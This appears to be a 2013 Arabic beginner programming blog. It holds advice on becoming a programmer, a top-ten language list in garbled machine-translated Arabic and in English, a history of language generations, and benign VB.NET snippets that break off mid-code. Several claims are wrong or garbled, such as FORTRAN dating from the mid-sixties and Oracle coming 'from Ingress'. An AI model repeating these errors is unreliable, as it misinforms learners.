12/07/2013

كيف أكون مبرمجا وكيف أتعلم البرمجة؟

كـــــيف تصـــــبح مبرمجـــــاً ؟؟؟ للمبتدئين
بسم الله الرحمن الرحيم
قد يكون البعض يأمل لتعلم البرمجة ويسأل نفسه

كــــيف أكـــــون مبرمجــــــــا وكـــــيف أتعلـــــم البرمجــــــة؟؟؟
كل ما تحتاجه رغبه وإرادة للوصول إلى لقب مبرمج
وفي الحقيقة اللقب لا يهم !
ما يهم هو..ما الذي ستنتجه؟
ما الذي ستضيفه إلى هذا العالم كونك مبرمج؟

ماهـــــي البرمجــــــة ؟
هى لغة التخاطب بين الإنسان و الآلة تتكون هذه اللغة من العديد من الأوامر لتنفيذ مهمة معينه ...
فما هي إلا عملية بسيطة تقوم فيها بكتابة بعض الأوامر للكمبيوتر ليقوم بتنفيذها.
والبرمجة لا تتطلب منك ذكاء أو مهارة خاصة
فالبرمجة يمكن لأي شخص البدء فيها حسب مهارته وقدرته على التعلم وحماسه لها

من أين تبدا تعلم لغات البرمجة ؟
هناك قاعدة تقول : أبدء من حيث انتهى الآخرون!!!
فلغات البرمجة تتطور بسرعة وبطريقة رهيبة ولا يمكنك مجاراتها إلا أذا بدأت بما انتهى إليه الآخرون ..
فهناك لغات برمجة عديدة موجدة ولكن التي ظهرت في الساحة مؤخراً هي لغات الدوت نت
وأشهرها لغة السى شارب ولغة الفيجوال بيسيك دوت نت أو يمكنك البدء بلغة الجافا مثلا ..

ما هي أسهل الطرق لتعلم لغات البرمجة ؟
أسهل الطرق لتعلم لغات البرمجة هي اخذ دورات متخصصة في اللغة التي تريد العمل عليها ...
ولكن بشرط أن تكون قارئ جيد فتطالع الكتب التي تظهر في هذا المجال وأيضا قراءة المقالات والدروس الموجودة على النت
ويوجد طريقة أخرى إذا كان عندك القليل من الخبرة وهى أن تعلم نفسك بنفسك وهذا الأسلوب الذي أتبعه شخصياً

وهل يمكن التعلم من على شبكة الإنترنت؟
نعم .. ولكن الدروس الموجودة على شبكة النت تكون مختصرة وبسيطة
وللمبتدأين عموماًَ ولكن لن تصل بك إلى مرحلة الاحتراف هذا بالنسبة للمواقع العربية ...
فيمكنك مطالعة الموجود على الإنترنت حتى تأخذ فكرة جيدة على اللغات ثم تختر اللغة التي تريد أن تتخصص فيها بعد ذلك .
أما إذا كنت تجيد الانجليزية فمع بعض الدورات المتقدمة يمكنك الوصول إلى الاحتراف
عن طريق النت أيضا بكل سهولة لكثرة مصادر اللغة الانجليزية لان كل جديد في مجال البرمجة لا يظهر إلا بلغته الأم الانجليزية ..

وما هي المدة المطلوب لإتقان اللغة ؟
لا يوجد مدة محددة ولكنها تعتمد عليك وعلى شخصيتك وقدرتك على المثابرة والتعلم ...

وكيف أصل للاحتراف في البرمجة ؟؟!!
الاحتراف في عالم البرمجة ليس له مقياس محدد... ولكن بكل بساطة يمكن اختزاله في تلك المقولة :
قدرتك على الانجاز وعمل كل ما فكرت به وتريده في اقصر مدة ممكنة وفى دقة متناهية .

ما الإختلاف بين لغات البرمجة ؟
بداية أوضح إن كل لغات البرمجة غالباً تتطور من أصل واحد ..
لذلك يمكن أن نقول أن وجه الاختلاف هو أسلوب البرمجة نفسه ..
ولكن أنت بخبرتك ودارستك بعد ذلك ستتعرف على الفروق إن شاء الله ...



وفى النهاية..


كان هذا عرضاً سريعاً وخلفية موجزة عن لغات البرمجة وأنواعها
تذكر أن محور حديثنا يتركز على تبسيط المعلومات للمبتدأين حديثاً... لذلك عندما تبدأ في العمل ستكتسب معلومات كثيرة ومهارات أفضل عن هذا إن شاء الله .
فإن لم تكن لديك المعرفة بما سبق ذكره من معلومات وتقنيات برمجيه،
فأرجوا أن لا يصيبك ذلك بالإحباط بل على العكس من ذلك يمكنك أن تعتبر نفسك محظوظ جداً ، حيث ستبدأ حياتك الجديدة من حيث أنتهي الآخرون ،
ومع احدث وأفضل تقنيه تستخدم لتطوير التطبيقات
وهي Microsoft.NET إن شاء الله

12/05/2013

اهم لغات البرمحة

1.Java

جافا والذي صدر في عام 1995 من قبل شركة صن Microsystemsis لغة وجوه المنحى الذي يستخدم مترجم . جافا هي لغة البرمجة رقم واحد حتى الآن. بل هو لغة البرمجة منظمة تنظيما جيدا مع مكتبة قوية من مكونات البرامج التي يعاد استخدامها. ويمكن لبرامج تشغيل مكتوب بلغة جافا على العديد من أبنية الكمبيوتر وأنظمة التشغيل المختلفة بسبب استخدام JVM ( آلة جافا الافتراضية) . ويشار أيضا إلى أنه جافا codeportability أو حتى يضم Wora ( الكتابة مرة واحدة ، تشغيلها في أي مكان ) .

أعظم قوة جافا هو يضم Wora ( الكتابة مرة واحدة ، runanywhere ) ، بل هو أيضا لغة البرمجة الأكثر شعبية في العالم لأنها تستخدم في شيء كل شيء، من أفران ميكروويف ل أجهزة الكمبيوتر فائقة. هو لغة البرمجة الأكثر عالمية في العالم.

أكبر نقاط الضعف جاوة هو أنه أبطأ من لغات البرمجة المترجمة أصلا .

2.C

كان C اللغة التي وضعتها دينيس ريتشي في عام 1972. يتم ترجمة ذلك، و تم تطويره للاستخدام في نظام التشغيل UNIX. وهي مصممة ل تكون محمولة من قبل الطبيعة، ولكن يجب أن يتم تصنيف البرامج neverthelessC خصيصا ل أجهزة الكمبيوتر مع أبنية مختلفة وأنظمة التشغيل. وهذا يجعلها بسرعة فائقة وسهولة البرمجة executed.C languageis لغة قديمة نسبيا ، ولكن لا يزال يستخدم على نطاق واسع للبرمجة نظام ، وكتابة لغات البرمجة الأخرى ، وفي النظم المضمنة .

و itsspeed أعظم قوة C .

أكبر نقطة ضعف C هو أنه يمكن أن يكون من الصعب جدا لإتقان إدارة الذاكرة الخاصة به.

3.C + +

وقد كتب C + + كتحديث ل C في عام 1979 من قبل بيارني Stroustrup . بل هو تجميع ومتعددة نموذج لغة البرمجة . يحاول أن يكون إلى الوراء متوافقة مع C و جوه التوجه ، والتي تساعد في مشاريع أكبر و يسمح flexibilty.Despite عصرها ، يتم استخدام C + + لإنشاء مجموعة واسعة من التطبيقات من الألعاب ل أجنحة المكاتب إلى موقع الويب . فمن السهل أن نفهم ويعد واحدا من استخدام لغة البرمجة الأكثر استخداما من قبل المبرمجين .

قوة C + + هو نفس سابقتها C ، وسرعة .

ضعف C + + هو أنه الأكبر سنا و تعتبر غير ملائمة من اللغات وجوه المنحى أحدث مثل Java أو C #.

4.PHP

وقد وضعت في عام 1996 من قبل PHP Lerdorf راسموس . وقد وضعت ل إنشاء صفحات الويب الديناميكية . PHP هي لغة متعددة نموذج يستخدم مترجم وقت التشغيل. في البداية، كان PHP ولا حتى لغة برمجة حقيقية، ولكن مع مرور الوقت أنها نمت في نهاية المطاف إلى وجوه المنحى لغة البرمجة واردة تماما . على الرغم من أن PHP تم muchcriticized في الماضي لكونها قذرة قليلا وغير آمنة ، انها كانت جيدة منذ وصول الإصدار 5 في عام 2004 . انه من الصعب ان تجادل مع النجاح. اليوم ، PHP هي اللغة الأكثر شعبية تستخدم لكتابة تطبيقات الويب.

نقاط القوة في PHP : هو جيد و برمجة الويب و التوثيق الجيد .

الضعف في PHP : بناء جملة غير متناسقة ، وطرق كثيرة جدا ل تفعل الشيء نفسه ، تاريخ من القرارات الأمنية غريبة.

5.VB ( أو Visual Basic )

تم تطوير Visual Basic عن طريق شركة مايكروسوفت ل منصة ويندوز. وهو تفسير ومتعددة نموذج لغة البرمجة . وقد تم ذلك تتطور على مر السنين و ينظر اليه على انه سليل مباشر من مايكروسوفت BASIC القديمة من عام 1970. البصرية الأساسية هي لغة برمجة جيدة ل تطبيقات ويندوز التي لا تحتاج إلى قوة وسرعة C #.

نقاط القوة في VB : لا شيء.

الضعف في VB : يعمل فقط في ويندوز.

6.Python

وقد وضعت الثعبان من قبل غيدو فان روسوم في عام late1980 لغرض البرمجة العامة . وهو تفسير ومتعددة نموذج لغة البرمجة . ولم يرد اسم الثعبان ثعبان بعد ولكن في الواقع بعد مجموعة الكوميديا مونتي بايثون . يتميز الثعبان قبل استخدامه من أجل قراءة المسافة البادئة ، و تشجيعه لرمز أنيقة بجعل المطورين تفعل أشياء مماثلة بطرق مشابهة . يستخدم الثعبان كخيار البرمجة الرئيسية من كل من غوغل وأوبونتو .

نقاط القوة في بيثون : قراءة ممتاز والفلسفة بشكل عام.

الضعف في بيثون : لا شيء.

7C #

وقد وضعت C # من قبل Microsoft. C # هي المترجمة، وجوه المنحى لغة البرمجة . فمن مواصفات مفتوحة، ولكن نادرا ما يشاهد على أي منصة ويندوز غير . وقد صممت C # كلغة مايكروسوفت من خلال طرحها صافي الإطار. أنها مشابهة جدا ل جافا في كل andnature بناء الجملة.

نقاط القوة في C # : ما هو قوي و سريع جدا .

الضعف في C # : مناسبة فقط من أجل Windows .

8.JavaScript

جافا سكريبت هو تفسير متعدد نموذج لغة البرمجة . و احد غريب جدا جدا. على الرغم من اسمها ، فإنه لا يملك شيئا على الإطلاق أن تفعل مع جافا . سوف نادرا ما ، انظر هذه اللغة outsideof متصفح ويب . انها اساسا لغة تهدف الى السلوكيات النصي في متصفحات الويب و استخدامها لأشياء مثل التحقق من صحة نموذج ويب و تطبيقات ويب نمط AJAX. الاتجاه في المستقبل ويبدو أن بناء تطبيقات أكثر وأكثر تعقيدا في جافا سكريبت ، و حتى العاب اون لاين بسيطة والنجاح suites.The مكتب هذا الاتجاه تعتمد على التقدم في سرعة abrowser في جافا سكريبت مترجم . إذا كنت تريد أن تكون صحيحة ، و اسمه الحقيقي ofthis لغة البرمجة هو ECMAscript ، على الرغم من أن لا أحد تقريبا callsit هذا الواقع .

نقاط القوة في جافا سكريبت : انها الوحيدة التي يعول عليها wayto قيام العميل برمجة الويب .

الضعف في جافا سكريبت : انها فقط مفيدة حقا مان متصفح ويب.

9.Perl

وقد وضعت بيرل من قبل لاري وول في عام 1986. بيرل هو aninterpreter ، متعدد نموذج لغة البرمجة . يتميز بناء جملة غير منظم إلى حد ما ومخيفة المظهر الذي من المنطقي أن المبرمجين PERL الأخرى. ومع ذلك ، هناك الكثير من المبرمجين المخضرم الحب و استخدام ifevery اليوم كلغة أساسية لهم . قبل 10 عاما، وكان بيرل thanit أكثر شعبية هو اليوم. ما حدث هو أن الكثير من المبرمجين والمبرمجين أحدث بيرل القديمة حتى تحولت إلى لغات أخرى مثل PHP، بيثون، و Ruby.Perl ربما لا تزال أفضل لغة ل تجهيز النصوص و إدارة نظام البرمجة .

نقاط القوة في بيرل : تجهيز النصوص و إدارة النظام .

الضعف في بيرل : له جملة غريبة، وربما طرق كثيرة جدا ل تفعل الشيء نفسه .

10.Ruby

وقد وضعت روبي من قبل يوكيهيرو ماتسوموتو حول 1995.Ruby هو تفسير وجوه المنحى لغة البرمجة . وهي واحدة من أكثر اللغات وجوه المنحى في العالم. كل شيء هو كائن في روبي، حتى الحروف والأرقام يمكن أن يكون لاستدعاءات الأسلوب . انها لغة رائعة لتعلم إذا كنت تحب الكائنات. السلبية الوحيدة هي أن حبها لل كائن التوجه نحو يجعلها بطيئة بعض الشيء ، حتى بالنسبة ل لغة تفسيرها.

نقاط القوة في روبي: لعل اللغة الموجهة mostobject في العالم .

ضعف روبي : بسبب objectmodel المتفوقة ، فإنه بطيئة بعض الشيء .

Programming languages, the most important

1.Java
Java which was released in 1995 by Sun Microsystemsis an object-oriented language which uses a compiler. Java is the number one programming language to date. It is a well-organized programming language with a strong library of reusable software components. Programs written in Java can run on many different computer architectures and operating systems because of the use of the JVM (Java virtual machine). Java is also referred to as codeportability or even WORA (write once, run anywhere).
Java’s greatest strength is WORA (write once, runanywhere), it is also the most popular programming language in the world as it is used in everything thing, from microwaves to super computers. It is the most universal programming language in the world.
Java’s greatest weaknesses is that it is slower than natively compiled programming languages.
2.C
was language developed by Dennis Ritchie in 1972. It is compiled, and was developed for use in the UNIX operating system. It is designed to be portable by nature, but neverthelessC programs must be specifically compiled for computers with different architectures and operating systems. This makes them super fast and easily executed.Cprogramming languageis a relatively old language, but it is still widely used for system programming, writing other programming languages, and in embedded systems.
The greatest strength of C is itsspeed.
C's greatest weakness is that it can be very difficult to master its Memory management.
3.C++
C++ was written as an update to C in 1979 by Bjarne Stroustrup. It is a compiled, multi-paradigm programming language. It attempts to be backwards-compatible with C and is object-orientation, which helps in larger projectsand allows flexibilty.Despite its age, C++ is used to create a wide array of applications from games to office suitesto websiteIt is easy to understand and is one of the most commonly used programming language use by programmers.
The strength of C++ is the same as its predecessor C, speed.
The weakness of C++ is that it is older and considered clumsier than newer object-oriented languages such as Java or C#.
4.PHP
PHP was developed in 1996 by Rasmus Lerdorf. It was developed to create dynamic web pages. PHP is a multi-paradigm language that uses a run-time interpreter. In the beginning, PHP was not even a real programming language, but over time it eventually grew into a fully featured object-oriented programming language. Although PHP has been muchcriticized in the past for being a bit sloppy and insecure, it's been pretty good since version 5 came out in 2004. It's hard to argue with success. Today,PHP is the most popular language used to write web applications.
Strengths of PHP: it is and good Web programming and a good documentation.
Weaknesses of PHP: Inconsistent syntax, too many ways to do the same thing, a history of bizarre security decisions.
5.VB (or Visual Basic)
Visual Basic was developed by Microsoft Corporation for the Windows platform. It is an interpreted, multi-paradigm programming language. It has been evolving over the years and is seen as a direct descendant of Microsoft's old BASIC from the 1970's. Visual Basic is a good language for scripting Windows applications that do not need the power and speed of C#.
Strengths of VB: None.
Weaknesses of VB: Only runs in Windows.
6.Python
Python was developed by Guido van Rossum in the late1980's for the purpose of general programming. It is an interpreted, multi-paradigm programming language. Python was not named after the snake but actually after the Monty Python comedy group. Python is characterized by its use of indentation for readability, and its encouragement for elegant code by making developers do similar things in similar ways. Python is used as the main programming choice of both Google and Ubuntu.
Strengths of Python: Excellent readability and overall philosophy.
Weaknesses of Python: None.
7C#
C# was developed by Microsoft. C# is a compiled,object-oriented programming language. It is an open specification, but rarely seen on any non-Windows platform. C# was conceived as Microsoft's premium language in its .NET Framework. It is very similar to Java in both syntax andnature.
Strengths of C#: It is powerful and pretty fast.
Weaknesses of C#: Only suitable for Windows.
8.JavaScript
JavaScript is an interpreted, multi-paradigm programming language. A very strange one too. Despite its name, it has nothing whatsoever to do with Java. You will rarely, if ever, see this language outsideof a web browser. It is basically a language meant to script behaviors in web browsers and used for things such as web form validation and AJAX style web applications. The trend in the future seems to be building more and more complex applications in JavaScript, even simple online games and office suites.The success of this trend will depend upon advancements in the speed of abrowser's JavaScript interpreter. If you want to be correct, the real name ofthis programming language is ECMAscript, although almost nobody actually callsit this.
Strengths of JavaScript: it's the only reliable wayto do client-side web programming.
Weaknesses of JavaScript: it's only really useful ina web browser.
9.Perl
Perl was developed by Larry Wall in 1986. Perl is aninterpreter, multi-paradigm programming language. It is characterized by a somewhat disorganized and scary-looking syntax which only makes sense to other PERL programmers. However, a lot of veteran programmers love it and use ifevery day as their primary language. 10 years ago, Perl was more popular thanit is today. What happened is that a lot of newer programmers and even old Perl programmers have switched to other languages such as PHP, Python, and Ruby.Perl is perhaps still the best language for text processing and system administration scripting.
Strengths of Perl: Text processing and system administration.
Weaknesses of Perl: it has a strange syntax, and perhaps too many ways to do the same thing.
10.Ruby
Ruby was developed by Yukihiro Matsumoto around 1995.Ruby is an interpreted, object-oriented programming language. It is one of the most object-oriented languages in the world. Everything is an object in Ruby,even letters and numbers can have method calls. It's a great language to learn if you love objects. The only negative is that its love of object-orientation makes it a bit slow, even for an interpreted language.
Strengths of Ruby: Perhaps the world's mostobject-oriented language.
Weaknesses of Ruby: Because of its superior objectmodel, it a bit slow.

لغات البرمجة...

لغات البرمجة
يقوم الحاسب الآلي عند أداء أي عمل من أعماله بتتبع مجموعة من التعليمات المتسلسلة والمترابطة التي تسمى البرنامج، ويسمى من يكتب هذه التعليمات بالمبرمج، ويعتمد تركيب الجمل والتعليمات على لغة البرمجة المستخدمة، ويتصل الإنسان بالحاسب لتوجيهه للقيام بالأعمال التي يريدها بواسطة لغات البرمجة .
1ـ لغة الآلة :
وتسمى "اللغة الثنائية" حيث إنها تتكون من سلسلة من 0 و 1، وهي اللغة الوحيد التي يفهمها الحاسب الآلي، حيث تحول جميع اللغات إلى لغة الآلة، حتى تتمكن معدات الحاسب الآلي من التفاهم معها، ولأنها تتكون من صفر وواحد، لذا فقد تميزت هذه اللغة بالصعوبة نظراً لما تتطلبه من حفظ ودقة في كتابة سلسلة طويلة من صفر وواحد بترتيب معين، مما ينتج عنه أخطاء كثيرة من الترميز، ويجب أن يحدد المبرمج كل شي، فكل خطوة يجب أن ينفذها البرنامج يجب أن ترمز، لذا فالمبرمج يجب أن يكون على علم بتركيب الحاسب الداخلي، والعنا وين الرقمية لمواقع التخزين، سواء للبيانات أو التعليمات، كما أن لكل جهاز لغة آلة تختلف عن الجهاز الآخر بحسب النوع والتركيب مما يعني أنه يجب كتابة البرنامج بشكل ككامل مره أخرى عن الرغبة في تنفيذه على جهاز آخر، ونتيجة لهذه الصعوبات فقد ظهرت طرق أخرى لتمثيل الترميز الثنائي، كالنظام الثماني OCTAL والستة عشري HEX-ADECIMAL بدلا من 1، 0 فالنظام الستة عشرين يتكون من ستة عشر رمزاُ هي : 0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 A.B,C,D,E,F .
مما يساعد على سهولة قراءة التعليمات المكتوبة وحفظها بهذه اللغة، فبدلا من كتابة 16 رقماً في سلسلة يمكن الاستعاضة عنها بأربعة رموز من رموز النظام التشغيل الستة عشري .
2ـ لغة التجميع :
ظهرت لغة التجميع بوصفها أو لغة ترميز، تستخدم الرموز SYMBOLIC CODE للتعبير عن تعليمات لغة الآلة، وذلك لمواجهة صعوبة الترميز بلغة الآلة، ولغة التجميع لغة قريبة من لغة الآلة التي يفهمها الحاسب الآلي، وتسمى هذه اللغات بلغات المستوى البسيط .
ويتم استعمال مختصرات ورموز يسهل حفظها وكتابتها لكل تعليمة من تعليمات لغة الآلة، ولغة التجميع كما في لغة الآلة مصممة للعمل على حاسب معين، مما يوفر قدرة أكبر على استغلال موارد الحاسب الآلي ووحدة المعالجة المركزية بشكل أفضل، ويقوم البرنامج المسمى المجمع ASSEMBLER بترجمة البرنامج المكتوب بلغة المجمع إلى لغة الآلة .
3 ـ اللغات العليا :
سميت بهذا الاسم لأنه أصبح بإمكان المبرمج كتابة البرنامج دون معرفة تفاصيل كيفية قيام الحاسب بهذه العمليات، كمواقع التخزين وتفاصيل الجهاز الدقيقة، وتعبيرات لغات المستوى العالي هي تعبيرات شبيهة إلى درجة كبيرة باللغة الطبيعية التي يستخدمها الإنسان في حياته للتواصل، والتخاطب مع الآخرين .
ومن مميزات اللغات العليا التي تميزها من لغات المستوى البسيط، بالإضافة إلى ما سبق، أن هذه اللغات غير مرتبطة بجهاز معين . أي يمكننا تنفيذ البرنامج المكتوب بلغة من لغات المستوى العالي، كالفورتران أو الكوبول أو البيسك على أكثر من جهاز، كما يمكن استخدام أكثر من لغة ترجمة على حاسب معين . كذلك، فإن اكتشاف الأخطاء وتصحيحها أصبح أكثر سهولة بسبب سهولة قراءة البرامج وتتبعها وفهمها .
تسمى اللغات كالكوبول والفورتران والبيسك باللغات العليا الموجهة نحو إجراءات الحل ، PROCEDURE - ORIENTED LANGUAGES ، وهي اللغات التي يعطي فيها المبرمج التعليمات خطوة خطوة .
ويمر البرنامج المكتوب بلغات المستوى العالي بثلاث مراح قبل أن يكون جاهزاً للتنفيذ .
الترجمة TRANSLATION : تحويل البرنامج المكتوب بلغة المستوى العالي إلى لغة الآلة .
ـ الربط LINKING : ربط الروتينات المكتبية الكائنة بالمكتبة، والتعليمات الضرورية بالبرنامج .
3ـ التحميل LOADING : يقوم البرنامج بتحميل شفرة الهدف والروتينات المكتبية، والتعليمات على الذاكرة الرئيسة بغرض التنفيذ .
وكانت اللغات تصنف حسب قوتها إلى لغات أعمال، أو لغة علمية أو لغات مبتدئين ـ وفي وقتنا الحاضر ـ فإن معظم اللغات يمكن استخدامها بكفاءة في تطبيق أنواع التطبيقات كافة، ومن أشهر لغات المستوى العالي :
لغة الكوبول COBOL :
وكلمة COBOL هي اختصار للعبارة الإنجليزية Common Business Oriented Language ، وقد طورت وصممت هذه اللغة من لدن لجنة من مصنعي أنظمة الحاسب الآلي ومطوريها عام 1960م تسمى لجنة CODASYL اختصاراً لـ Conference of Data System Languages .
وقد قام المعهد الوطني الأمريكي للمعايير ANSI بتطوير نسخة معيارية من COBOL ، مفسر كوبول يطابق المواصفات القياسية لهذا المعهد، وكان ذلك ف ي عام 1968م وسميت "ANSI 1968" وظهر بعدها ANSI 1974 و ANSI 80 .
وينتشر استخدام لغة كوبول على نطاق واسع عالمياً حيث تستخدم في البنوك وفي المنظمات الحكومية، وتستخدم على حاسبات كبيرة أو على حاسبات شخصية .
وتتميز لغة كوبول بقدرتها على التعامل مع الملفات؛ لذا اشتهرت بأنها لغة أعمال .
لغة الفورتران FORTRAN :
وهي اختصار عبارة FORmula TRANSlation ، وتعد لغة FORTRAN أقدم اللغات ذات المستوى العالي، وقد ظهرت هذه اللغة في منتصف الستينات، حيث بدئ عام 1954 بالعمل على تطوير لغة برمجة تقبل برنامجا مكتوبا بلغة قريبة من لغة الإنسان، ويحوله إلى شفرة قابلة للتنفيذ على الحاسب الآلي، وبعد 3 سنوات أي في عام 1957م . ظهر أول مفسر فورتران.
وفي تلك الفترة كان استخدام الحاسب الآلي يكاد يكون حكراً على العلماء والمهندسين والرياضيين، ومن الطبيعي أن تكون هذه اللغة المطورة حديثاً قد جاءت لتواكب احتياجاتهم إذ تتميز لغة FORTRAN بقدراتها على إجراء العمليات الحسابية المعقدة وحل المعادلات الرياضية .
لغة البيسك BASIC LANGAUGE :
وهي اختصار للعبارة الإنجليزية Beginer's All Purpose Symbolic In struction Code أي اللغة المتعدد الأغراض للمبتدئين، وتأتي كلمة BASIC التي تعني الأساس لتحقيق المعنى نفسه، فهذه اللغة ونظراً لبساطة تعليماتها ومحدوديتها فإنها تعد لغة مناسبة للتعلم من قبل المبتدئين في عالم الحاسب الآلي والبرمجة، وتستخدم هذه اللغة في معظم الحاسبات الشخصية، مما يدل على الانتشار الواسع لها، وقد طورت هذه اللغة في كلية Dartmouth عام 1963م من لدن John Demuy و Thomas Kurtz .
وتستخدم لغة Basic الحديثة في قطاع واسع . إذ تستخدم في مجال الأعمال لقدرتها على التعامل مع الملفات، وكذا في العمليات الرياضية من قبل العلماء والمهندسين لامتلاكها كثيراً من الوظائف للقيام بمثل تلك العمليات المعقدة .
لغة باسكال PASCAL :
وسميت باسم العالم الفرنسي الرياضي الفذ Blaise Pascal ، وصممت هذه اللغة من قبل العالم السويسري Niklaus Wirth ، وطرحت عام 1971م، وقد انتشرت هذه اللغة خصوصاً في الجامعات . إذ تدرس هذه في معظم جامعات العالم لطلاب علوم الحاسب، وتمتاز لغة PASCAL بالسهولة، واختصار الكلمات فيها إلى حد كبير، وبنيتها التركيبية وقوة البرامج الفرعية، واستخدام المؤشرات Pointers ، وقد ظهرت نسخ جديدة من Pascal امتازت بتلافي العيوب في النسخ السابقة، ويعد TurboPascal من شركة Borland من البرامج المستخدمة بكثرة بين المبتدئين والتخصصين في البرامج، وتنافس هذه اللغة لغة Basic في كثرة المستخدمين لتوافر كثير من المميزات فيها، وتستخدم هذه اللغة من قبل الطلاب والمهندسين، كما تستخدم في قطاع الأعمال التجارية .
لغة سي C :
طورت هذه اللغة في معامل Bell من قبل Dennis Ritchie وهي تطوير لنسخة قديمه تسمى B من لغة BCPL التي ظهرت عام 1969م . لذا سميت هذه النسخة اللاحقة بـ C .
وتشتهر لغة C باستخدامها كلغة برمجة نظم system software حيث تستخدم لكتابة برامج النظم التشغيلية . إذ إنها تعد لغة قريبة، وتشبه إلى حد كبير لغة التجميع As-sembly وتمتاز بسرعتها الكبيرة، كما تملك مخجموعة جيدة من التعليمات، كما أنها لغة قابلة للنقل من جهاز إلى آخر لصغر الجزء الواجب نقله منها، وتعد لغة C من اللغات التركيبية Structured Language .
وازداد اهتمام محترفي البرمجة بلغة الـC ، والنسخ المحسنة منها C+ , C++ . إذ إن معظم التطبيقات تكتب بها .
لغات الجيل الرابع : Fourth-Generation language (4GL) :
سميت بهذا الاسم نسبة إلى الجيل التي ظهرت فيه، مثل هذه اللغات التي تتصف بقلة التعليمات التي يكتبها المبرمج لتحقيق هدف ما ، فما كان يتطلب مئات الأسطر من لغة بيسك أو الآلاف من لغة كوبول باستخدام عدد بسيط من الأسطر في هذه اللغات .
تمتاز هذه اللغات بعدة مزايا :
1ــ إنها لغة موجهة للنتائج أي إن المبرمج يهتم بطلب ما يريده من الكمبيوتر، دون أن يوجهه لكيفية القيام بذلك .
2ــ زادت من الإنتاجية؛ لأن كتابة البرامج وصيانتها أكثر سهولة .
3ــ سهلة الاستخدام، وتتطلب قليلاً من التدريب على استخدامها، سواء كان للبرمجة أو غيرها .
4ــ لم يعد المستخدم بحاجة إلى التفكير في الأجهزة أو هيكلية البرنامج .
وقد بدأت لغات الجيل الرابع بالانتشار بين المبرمجين، وبشكل كبير جداً لما توفره لغات البرمجة هذه من سهولة في معاملة الملفات، وربط هذه الملفات بعضها مع بعض بغرض التحديث أو طباعة التقارير .
كما توفر هذه اللغات قوة في المشاركة في الموارد البرمجية وخصوصاً الملفات، ومن أمثال هذه اللغات لغة Dbase من Borland ، ولغة Foxpro من Microsoft ، و Oracle من Ingress، وتستخدم لغة الاستفسار المهيكلة SQL Structured Query Language في عمليات بناء قواعد المعلومات وتحديثها، وتوفير الحماية اللازمة لها .
 ما هي SQL ؟
SQL هي اختصار للعبارة الإنجليزية Structured Query Language أي لغة الاستفسار المهيكلة، وهي عبارة عن مجموعة من التعليمات القريبة من اللغة الطبيعية التي توجه نظام إدارة قواعد البيانات DBMS للقيام بعمليات بناء قواعد البيانات، وتحديثها والبحث فيها، وعمل قواعد الحماية للبيانات .
وتمتاز لغة الاستفسار SQL بالآتي :
1ــ لغة قريبة من اللغة الطبيعية .
2ــ تستطيع الحصول على أية بيانات من قاعدة البيانات . إذ يمكن الحصول على بيانات ملف كامل أو بعض الحقول من ملف أو مجموعة ملفات .
3ــ يهتم المستخدم بتعريف احتياجه What you want، ولا يهتم بكيفية الحصول على أو من أين ؟ How or Where? .
اللغات الطبيعية Natural Language أو لغات الجيل الخامس :
ويقصد بها لغة الإنسان أي إيجاد لغة مبرمجة نستطيع بها توجيه الحاسب للقيام بما نريد من أعمال، وذلك باستخدام التعبيرات الشائعة ((اطبع تقريراً يحوي اسم الطالب والدرجة))،فالمستخدم ما عليه سوى طباعة الأمر أو إملائه للحاسب الذي يلبي الطلب .
فالمستخدم يستطيع إملاء النص وكتابته بعبارات متعدد تحمل المعنى نفسه، كأن يقول ((اطبع الاسم والدرجة لجميع الطلاب)) أو ((اطبع اسم الطالب ودرجة الاختبار للجميع))، فالطلبان لهما المعنى نفسه، وإن اختلفا في الصياغة، فلغات البرمجة هذه قادرة على فهم تراكيب الجمل المختلفة، وإن اختلفت اللهجات أو كان هناك أخطاء لغوية، وإذا لم يفهم الحاسب المقصود يقوم بتقديم أسئلة لمزيد من الوضوح والوصول إلى الهدف .
والأبحاث في مجال اللغات الطبيعية هو من المجالات التي يبحثها علم الذكاء الاصطناعي . A.I إذ إن فهم اللغة الطبيعية يحتاج إلى كثير من الخبرات والعلاقات في ربط الجمل وتحليل كل جملة لاستنتاج المعنى الصحيح، ومن ثم تقديم رد الفعل المناسب .
لغات الإنترنت :
لغة HTML : وهي إحدى اللغات المستخدمة لإنشاء صفحات الويب www .
إن (Hypertext Morkup Language) عبارة عن لغة تحوي مجموعة من الأوامر تؤدي إلى تكوين صفحات الويب، إن إنشاء صفحة بواسطة تركيبة Ascii على منسق الكلمات يمكن أن تحول إلى صفحة على الويب بإضافة بعض أوامر Html .
إن أوامر Html تمكن المستخدم من تنفيذ عدد من العمليات على صفحات الويب منها :
ـــ تحديد حجم النص وطريقة عرضه .
ـــ إنشاء الروابط مع الوثائق والمستندات الأخرى .
ـــ إنشاء نماذج تفاعلية مع الصفحة .
ـــ توفير الدعم للوسائط المتعددة كالفيديو والصوت والصورة .
لغة جافا Java : وهي من اللغات المستخدمة للانترنت ولصفحات الويب في www وتهدف لغة البرمجة هذه إلى إضافة الحيوية إلى صفحات الويب عبر النصوص المتحركة والرسوم التي تتحرك بشكل تفاعلي والوسائط المتعددة .
ولغة جافا طورت من قبل شركة Sun Microsystems على غرار لغة C++ وتقوم الوثائق المنشئة بلغة الترميز النصي Html باستدعاء برامج جافا كما يكن تشغيلها بصورة منفردة .

مجموعة مهمه من الاكواد

نبدا بكتابة الاكواد




اخفاء الفورم
كود:
Me.Hide()

-----------------------

كود اظهار الفورم الثاني
كود:
Form2.Show()

*
اذا ردت سوي اظهار لفروم اخر مثل فروم 4 غير رقم 2 الى 4

------------------------
كود الخروج من البرنامج او من فروم واحد
كود:
Me.Close()


----------------------
انهاء عمل البرنامج بالكامل
كود:
End
----------------------------------------
كود المسج بوكس
كود:
MessageBox.Show("اكتب هنا")

-------------------------------------------

اذا ردنة نخلي باسورد لفروم او برنامج
كود:
devpoint:
Dim Yasir as string
Yasir = InputBox("ادخل كلمة مرور")
If Yasir = "ضع هنا باسورد" then
MessageBox.show("تم فتح برنامج")
Else
MessageBox.Show("باسورد غلط")
Goto devpoint
End if
-------------------------------------

كود فتح موقع مباشرتنا
كود:
Process.Start("ضع رابط موقع هنا")
-------------------------------------------

كود فتح ملف في جهاز
كود:
Process.start("مسار الملف مراد فتحة")
-------------------------------------

كود لجعل البرنامج يعمل مرة واحدة
كود:
yasir()



Sub yasir()
        Dim appProc() As Process
        Dim strModName, strProcName As String
        strModName = Process.GetCurrentProcess.MainModule.ModuleName
        strProcName = System.IO.Path.GetFileNameWithoutExtension(strModName)
        appProc = Process.GetProcessesByName(strProcName)
        If appProc.Length > 1 Then
